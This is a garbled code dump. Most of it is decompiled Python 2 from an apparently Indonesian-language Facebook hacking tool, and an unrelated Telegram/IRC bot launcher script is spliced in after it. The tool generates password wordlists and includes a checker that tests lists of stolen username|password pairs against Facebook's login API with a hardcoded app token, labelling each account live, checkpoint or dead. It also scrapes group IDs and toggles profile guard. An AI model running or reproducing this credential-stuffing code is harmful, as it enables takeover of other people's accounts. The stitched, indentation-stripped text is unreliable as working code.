c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
main.py
|
# main.py
import datetime
# import whois
import json
import socket
import time
import traceback
from random import choice
from threading import Thread
from urllib.parse import quote as urlencode
from urllib.parse import unquote
from urllib.error import URLError
import pytz
import requests
import socks
import subprocess
from pytrends.request import TrendReq
import settings
import translate_krzb
from settings import settings as option
from settings import getconfig
from helpers import get_pretty_json_string, shell
from tgbich import run_tgbich
from ircbich import ircbich_init_and_loop
functions = {'tg': run_tgbich, 'irc': ircbich_init_and_loop}
print(f"{__file__}, {__name__}: starting")
from multiprocessing import Process
import os
print(f"{__file__}, {__name__}: pytrends: processing Trend Requests")
while True:
try:
pytrends = TrendReq(hl='ru-RU', tz=360)
break
except KeyboardInterrupt as e:
raise e
except:
traceback.print_exc()
TIME_TO_SLEEP_SECONDS = 1
print("sleeping %s seconds" % str(TIME_TO_SLEEP_SECONDS))
time.sleep(TIME_TO_SLEEP_SECONDS)
continue
print(f"{__file__}, {__name__}: pytrends: completed.")
# launch processes
def launch_all():
print("processing configs")
cfg = getconfig()
print("processing connections")
connections = cfg["connections"]
for key in connections.keys():
print(f"processing connections.{key}")
section = connections[key]
for section_key in section.keys():
print(f" processing connections.{key}.{section_key}")
conn_props = section[section_key]
print(f" launching connection {key}.{section_key}, conn_props='{conn_props}'")
Process(target=functions[key], args=(key, conn_props, cfg, )).start()
print(f" launched connection {key}.{section_key}")
print(f" processed connections.{key}.{section_key}")
print(f"processed connections.{key}")
print("all launched; processed all connections")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.